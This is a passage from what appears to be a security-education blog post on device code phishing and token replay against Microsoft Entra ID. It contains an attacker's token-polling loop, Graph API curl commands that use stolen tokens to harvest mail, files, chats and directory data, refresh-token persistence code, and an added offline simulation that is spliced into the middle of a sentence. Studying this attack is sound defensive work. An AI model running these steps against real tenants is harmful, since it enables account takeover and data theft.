style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> resp</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[+] Token acquired!\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Access token:\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Refresh token:\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" 
style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"error\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"authorization_pending\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sleep</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"error\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"expired_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[-] Code expired, regenerate\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><br></span></code></pre></div></div>\n<p><strong>Step 3: Victim receives the phishing email and enters the code on the real Microsoft page</strong></p>\n<p>The victim navigates to <code>https://microsoft.com/devicelogin</code> (Microsoft's own domain, valid certificate, no phishing indicators), enters <code>ABCD-EFGH</code>, signs in with their real credentials, completes MFA (push, TOTP, whatever the tenant requires), and clicks \"Continue.\"</p>\n<p><strong>Step 4: Attacker's polling loop returns 
tokens</strong></p>\n<p>The moment the victim clicks \"Continue,\" the next poll returns:</p>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"token_type\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Bearer\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"scope\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"openid profile email offline_access https://graph.microsoft.com/.default\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"expires_in\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span 
class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">3599</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"access_token\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"eyJ0eXAiOiJKV1QiLCJub25jZSI6....\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"refresh_token\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"0.AUkA2...[90-day token]\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"id_token\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"eyJ0eXAiOiJKV1Qi...\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p>The attacker now has:</p>\n<ul>\n<li class=\"\">An <strong>access 
token</strong> valid for roughly 60 minutes, scoped to Microsoft Graph: immediate Graph API access</li>\n<li class=\"\">A <strong>refresh token</strong> valid for 90 days of inactivity (sliding) or until revoked: persistent access</li>\n</ul>\n<p>MFA was satisfied. By the victim. For the attacker's session. This is working as designed.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"13-what-the-attacker-can-do-with-the-tokens\">1.3 What the Attacker Can Do With the Tokens<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#13-what-the-attacker-can-do-with-the-tokens\" class=\"hash-link\" aria-label=\"Direct link to 1.3 What the Attacker Can Do With the Tokens\" title=\"Direct link to 1.3 What the Attacker Can Do With the Tokens\" translate=\"no\">​</a></h3>\n<p>With the Graph API access token, the attacker immediately begins reconnaissance (the URLs that carry OData query options are single-quoted so the shell does not expand <code>$top</code> and <code>$select</code> as variables):</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List mailbox messages (100 per page; follow @odata.nextLink for the rest)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'https://graph.microsoft.com/v1.0/me/messages?$top=100&amp;$select=subject,from,receivedDateTime'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List the OneDrive root (each item carries @microsoft.graph.downloadUrl; recurse via /items/{id}/children)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/drive/root/children\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List the user's Teams chats, then /me/chats/{id}/messages per chat (getAllMessages needs application permissions, not a delegated token)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/chats\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List all users in the tenant</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'https://graph.microsoft.com/v1.0/users?$top=999&amp;$select=displayName,mail,userPrincipalName,jobTitle'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Groups and directory roles this user belongs to (privileged roles show up here)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/memberOf\"</span><br></span></code></pre></div></div>\n<p>Within the first 15 minutes of the access token lifetime, a threat actor can extract the full mailbox content of a C-suite executive, identify privileged groups and roles and their members, exfiltrate all OneDrive and SharePoint files accessible to that user, and read all Teams conversation history, including channels with sensitive strategic discussions.</p>\n<p>The refresh token extends this for 90 days:</p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Refresh token exchange: get a new access token when the old one expires</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">r </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" 
style=\"color:hsl(139, 66%, 32%)\">\"https://login.microsoftonline.com/common/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"&lt;90-day token&gt;\"</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"scope\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/.default offline_access\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Returns a new access_token + new refresh_token (sliding window)</span><br></span></code></pre></div></div>\n<p>The refresh token slides: each use returns a new refresh token and restarts the 90-day inactivity window. As long as the attacker redeems it at least once every 90 days, access persists until the token is revoked, whether by an administrator (the Graph <code>revokeSignInSessions</code> action, or <code>Revoke-MgUserSignInSession</code> in PowerShell) or by a password change, which also invalidates the user's refresh tokens.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"14-dynamic-code-generation-bypassing-the-15-minute-expiry\">1.4 Dynamic Code Generation: Bypassing the 15-Minute Expiry<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#14-dynamic-code-generation-bypassing-the-15-minute-expiry\" class=\"hash-link\" aria-label=\"Direct link to 1.4 Dynamic Code Generation: Bypassing the 15-Minute Expiry\" title=\"Direct link to 1.4 Dynamic Code Generation: Bypassing the 15-Minute Expiry\" translate=\"no\">​</a></h3>\n<p>Early device code phishing campaigns had a critical weakness: the code expired 15 minutes after generation. Attackers who pre-generated codes and embedded them in bulk phishing emails lost the race if the victim opened the email more than 15 minutes after sending.</p>\n<p>The <strong>SquarePhish2</strong> toolkit and the <strong>EvilTokens PhaaS platform</strong> (documented in early 2026) solve this with dynamic generation: the lure carries no code. It links to attacker-controlled infrastructure, which requests the device code from Entra only when the victim clicks and then presents the code to the victim or hands them off to the verification page.</p>\n<p>The victim has a 15-minute window from the moment they click, which is far more than enough time to complete authentication.
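</p>
<p>The device code exchange in Steps 1 to 4 above and the dynamic generation just described, as an added example that is not code from the original page or from Microsoft: an in-memory model of the OAuth 2.0 device authorization grant (RFC 8628) in which the authorization server, the victim's approval on the verification page and the attacker's polling client are all simulated on an explicit clock, so the whole exchange runs offline. The class and function names, the simulated clock, the <code>at.</code>/<code>rt.</code> token format and the scenario timings are assumptions of this model, not Entra ID internals. The model reproduces the responses the attacker's loop sees (<code>authorization_pending</code>, <code>slow_down</code>, <code>expired_token</code>, then tokens), shows that the tokens go to whoever holds the <code>device_code</code> rather than to the browser that passed MFA, and contrasts a code minted when the lure is sent with one minted when the victim clicks, which is the difference the dynamic generation in section 1.4 exploits.</p>
```python
# Added example (not the page's or Microsoft's code): an in-memory model of the
# OAuth 2.0 device authorization grant (RFC 8628) with the authorization server,
# the victim's approval and the attacker's polling client all simulated on an
# explicit clock. Names, the clock and the token format are assumptions.
import secrets
import string
from dataclasses import dataclass
from typing import Optional

CLIENT_ID = 'd3590ed6-52b3-4102-aeff-aad2292ab01c'  # Microsoft Office, as in the article
USER_CODE_TTL = 900   # seconds, matching "expires_in": 900 in the device code response
POLL_INTERVAL = 5     # seconds, matching "interval": 5


@dataclass
class PendingAuth:
    client_id: str
    issued_at: int
    approved_by: Optional[str] = None   # set once the victim completes sign-in + MFA
    approved_at: Optional[int] = None
    last_poll: Optional[int] = None


class MockAuthorizationServer:
    """Stand-in for login.microsoftonline.com; time is passed in explicitly."""

    def __init__(self) -> None:
        self._by_device_code, self._by_user_code = {}, {}

    def device_authorization(self, client_id: str, now: int) -> dict:
        """Step 1: the attacker's client asks for a device_code / user_code pair."""
        user_code = '-'.join(''.join(secrets.choice(string.ascii_uppercase)
                                     for _ in range(4)) for _ in range(2))
        device_code = secrets.token_urlsafe(32)
        pending = PendingAuth(client_id=client_id, issued_at=now)
        self._by_device_code[device_code] = pending
        self._by_user_code[user_code] = pending
        return {'device_code': device_code, 'user_code': user_code,
                'verification_uri': 'https://microsoft.com/devicelogin',
                'expires_in': USER_CODE_TTL, 'interval': POLL_INTERVAL}

    def approve(self, user_code: str, username: str, mfa_ok: bool, now: int) -> str:
        """Step 3: the victim types the user code on the real verification page. The
        session that passes MFA is the victim's; only the code links it to the request."""
        pending = self._by_user_code.get(user_code)
        if pending is None or now - pending.issued_at > USER_CODE_TTL:
            return 'invalid_or_expired_code'
        if not mfa_ok:
            return 'mfa_required'
        pending.approved_by, pending.approved_at = username, now
        return 'ok'

    def token(self, client_id: str, device_code: str, now: int) -> dict:
        """Steps 2 and 4: the polling client presents the device code. Whoever holds
        it gets the tokens; nothing binds them to the browser that approved."""
        pending = self._by_device_code.get(device_code)
        if pending is None or pending.client_id != client_id:
            return {'error': 'invalid_grant'}
        if now - pending.issued_at > USER_CODE_TTL:
            return {'error': 'expired_token'}
        if pending.last_poll is not None and now - pending.last_poll < POLL_INTERVAL:
            pending.last_poll = now
            return {'error': 'slow_down'}
        pending.last_poll = now
        if pending.approved_at is None or now < pending.approved_at:
            return {'error': 'authorization_pending'}
        return {'token_type': 'Bearer', 'expires_in': 3599,   # kind.subject.random stands in for a JWT
                'access_token': f'at.{pending.approved_by}.{secrets.token_hex(8)}',
                'refresh_token': f'rt.{pending.approved_by}.{secrets.token_hex(8)}'}


def attacker_poll(server: MockAuthorizationServer, device_code: str, start: int, deadline: int):
    """The article's polling loop on a simulated clock instead of time.sleep, plus
    slow_down handling (the article's loop re-polls immediately on any other error)."""
    now, interval = start, POLL_INTERVAL
    while now <= deadline:
        resp = server.token(CLIENT_ID, device_code, now)
        if 'access_token' in resp:
            return 'tokens', resp, now
        error = resp.get('error')
        if error == 'expired_token':
            return 'expired', resp, now
        if error == 'slow_down':
            interval += POLL_INTERVAL
        now += interval
    return 'gave_up', None, now


def run_scenario(victim_delay: int, dynamic: bool):
    """victim_delay: seconds after the lure is sent at which the victim clicks and signs in.
    dynamic=False mints the code at t=0 (pre-generated); dynamic=True mints it at click time."""
    server = MockAuthorizationServer()
    issued_at = victim_delay if dynamic else 0
    dc = server.device_authorization(CLIENT_ID, now=issued_at)
    approval = server.approve(dc['user_code'], 'ceo@contoso.example', mfa_ok=True, now=victim_delay)
    outcome, resp, _ = attacker_poll(server, dc['device_code'], start=issued_at,
                                     deadline=issued_at + USER_CODE_TTL + POLL_INTERVAL)
    return approval, outcome, resp


if __name__ == '__main__':
    for delay, dynamic in ((600, False), (1800, False), (1800, True)):
        print(f't={delay}s dynamic={dynamic}:', run_scenario(delay, dynamic)[:2])
```
<p>Running the block prints one line per scenario: a pre-generated code approved at t=600 s yields tokens, the same code at t=1800 s has expired for both the victim and the attacker, and a code minted at click time at t=1800 s yields tokens again. The <code>slow_down</code> branch is the one the article's loop lacks; RFC 8628 defines it for clients that poll faster than <code>interval</code>, and a loop that ignores it keeps hammering the token endpoint.</p>
<p>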
The attacker's timing problem is completely eliminated.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-2--token-replay-stealing-what-was-already-legitimately-issued\">Part 2  Token Replay: Stealing What Was Already Legitimately Issued<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-2--token-replay-stealing-what-was-already-legitimately-issued\" class=\"hash-link\" aria-label=\"Direct link to Part 2  Token Replay: Stealing What Was Already Legitimately Issued\" title=\"Direct link to Part 2  Token Replay: Stealing What Was Already Legitimately Issued\" translate=\"no\">​</a></h2>\n<p>Device code phishing manipulates the issuance process. Token replay skips it entirely  the attacker steals a token that was issued legitimately during a real user session.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-where-tokens-live-and-how-theyre-stolen\">2.1 Where Tokens Live and How They're Stolen<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#21-where-tokens-live-and-how-theyre-stolen\" class=\"hash-link\" aria-label=\"Direct link to 2.1 Where Tokens Live and How They're Stolen\" title=\"Direct link to 2.1 Where Tokens Live and How They're Stolen\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"browser-session-cookies-pass-the-cookie\">Browser Session Cookies (Pass-the-Cookie)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#browser-session-cookies-pass-the-cookie\" class=\"hash-link\" aria-label=\"Direct link to Browser Session Cookies (Pass-the-Cookie)\" title=\"Direct link to Browser Session Cookies (Pass-the-Cookie)\" translate=\"no\">​</a></h4>\n<p>When a user authenticates to Microsoft 365, Entra ID issues session cookies. 
